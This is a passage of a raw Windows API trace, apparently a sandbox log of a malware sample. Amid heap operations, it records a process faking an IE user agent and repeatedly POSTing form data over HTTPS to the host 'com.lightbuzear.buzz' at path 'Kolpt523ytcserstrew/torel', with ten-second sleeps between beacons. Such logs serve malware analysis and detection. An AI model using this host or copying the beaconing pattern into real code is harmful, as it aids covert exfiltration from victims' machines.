RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48152e8 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0197.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152e8 | out: hHeap=0x4780000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815400 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0197.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0197.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0197.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0197.662] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0197.662] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0198.675] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0198.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0198.675] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0198.676] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa90 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0198.676] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0198.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0198.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815298 [0198.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0198.677] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151f8 [0198.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0198.677] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0198.678] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0198.678] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0198.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48151f8 | out: hHeap=0x4780000) returned 1 [0198.678] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0198.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0198.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0198.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0198.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0198.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0198.678] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0198.678] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa90 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152e8 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0198.679] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815478 [0198.679] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0198.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0198.680] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0198.680] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0198.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815478 | out: hHeap=0x4780000) returned 1 [0198.680] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0198.680] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0198.680] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0198.680] FreeLibrary (hLibModule=0x71570000) returned 1 [0198.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0198.680] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0198.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0198.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0198.681] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0198.682] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0198.682] Sleep (dwMilliseconds=0x2710) [0198.699] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0198.699] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0198.699] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0198.699] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0198.699] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f970 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f970 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa90 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0198.700] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0198.700] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fad8 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f970 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f970 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815040 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0198.701] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0198.702] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0198.702] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0198.702] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0198.702] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0198.702] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0198.702] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0198.702] FreeLibrary (hLibModule=0x71780000) returned 1 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48152c0 | out: hHeap=0x4780000) returned 1 [0198.703] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151f8 [0198.703] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0198.703] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0198.704] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0198.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f970 [0198.704] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815388 [0198.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815388 | out: hHeap=0x4780000) returned 1 [0198.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48152c0 [0198.705] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815388 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0198.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0198.705] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f928 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fad8 [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815428 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815428 | out: hHeap=0x4780000) returned 1 [0198.706] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0198.706] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0198.706] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fbb0 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fbb0 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48154a0 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0198.707] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815428 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0198.707] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0198.708] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0198.708] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0198.708] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0198.708] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fbb0 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fbb0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0198.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815478 [0198.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0198.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0198.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0198.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0198.711] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0198.711] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0199.858] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0199.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0199.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0199.859] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb98 [0199.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x4780000, 